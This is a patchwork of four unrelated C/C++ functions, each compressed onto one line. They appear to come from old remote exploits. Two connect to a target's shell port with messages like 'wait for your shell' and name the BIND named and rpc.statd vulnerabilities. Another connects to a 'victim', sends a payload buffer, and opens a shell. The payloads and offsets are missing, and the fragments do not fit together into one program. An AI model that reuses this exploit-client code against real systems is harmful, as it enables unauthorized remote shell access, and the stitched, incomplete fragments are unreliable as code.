connection(struct sockaddr_in host) { int sockd; host.sin_port = htons(36864); printf("[*] connecting..\n"); usleep(2000); if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { exit(EXIT_FAILURE); } if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1) { printf("[*] wait for your shell..\n"); usleep(500); runshell(sockd); } else { printf("[x] error: named not vulnerable or wrong offsets used\n"); } close(sockd); }
void connection(struct sockaddr_in host) { int sockd; host.sin_port = htons(39168); if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); exit(EXIT_FAILURE); } if(!connect(sockd, (struct sockaddr *) &host, sizeof host)) { printf("OMG! You now have rpc.statd technique!@#$!\n"); runshell(sockd); } close(sockd); }
void Shell::select(const std::string& exec, size_t argc, const std::string* argv) { if(exec == "open") open(argc, argv); else if(exec == "seek") seek(argc, argv); else if(exec == "tell") tell(argc, argv); else if(exec == "write") write(argc, argv); else if(exec == "read") read(argc, argv); else if(exec == "close") close(argc, argv); else if(exec == "useradd") useradd(argc, argv); else if(exec == "chpsd") chpsd(argc, argv); else if(exec == "cd") cd(argc, argv); else if(exec == "mkdir") mkdir(argc, argv); else if(exec == "mkfile") mkfile(argc, argv); else if(exec == "rm") rm(argc, argv); else if(exec == "cat") cat(argc, argv); else if(exec == "ls") ls(argc, argv); else if(exec == "chmod") chmod(argc, argv); else if(exec == "see") see(argc, argv); else if(exec == "ocp") ocp(argc, argv); else runshell(exec, argc, argv); }
void mk_connect(char victim[128], int port) { struct hostent *host; struct sockaddr_in den0n; int sox; den0n.sin_family = AF_INET; den0n.sin_port = htons(port); host = gethostbyname(victim); if (!host) { printf("cannot resolve, exiting...\n"); exit(0); } bcopy(host->h_addr, (struct in_addr *)&den0n.sin_addr, host->h_length); sox = socket(AF_INET, SOCK_STREAM, 0); signal(SIGALRM, sigalarm); alarm(10); printf("connecting to %s to port %d\n",host->h_name, port); if (connect(sox, (struct sockaddr *)&den0n, sizeof(struct sockaddr)) < 0) { putchar('\n'); perror("connect"); exit(1); } printf("connected!, sending the buffer...\n\n"); write(sox, yahoo , strlen(yahoo)); printf("%s\n", yahoo); sleep(1); alarm(0); runshell(sox); }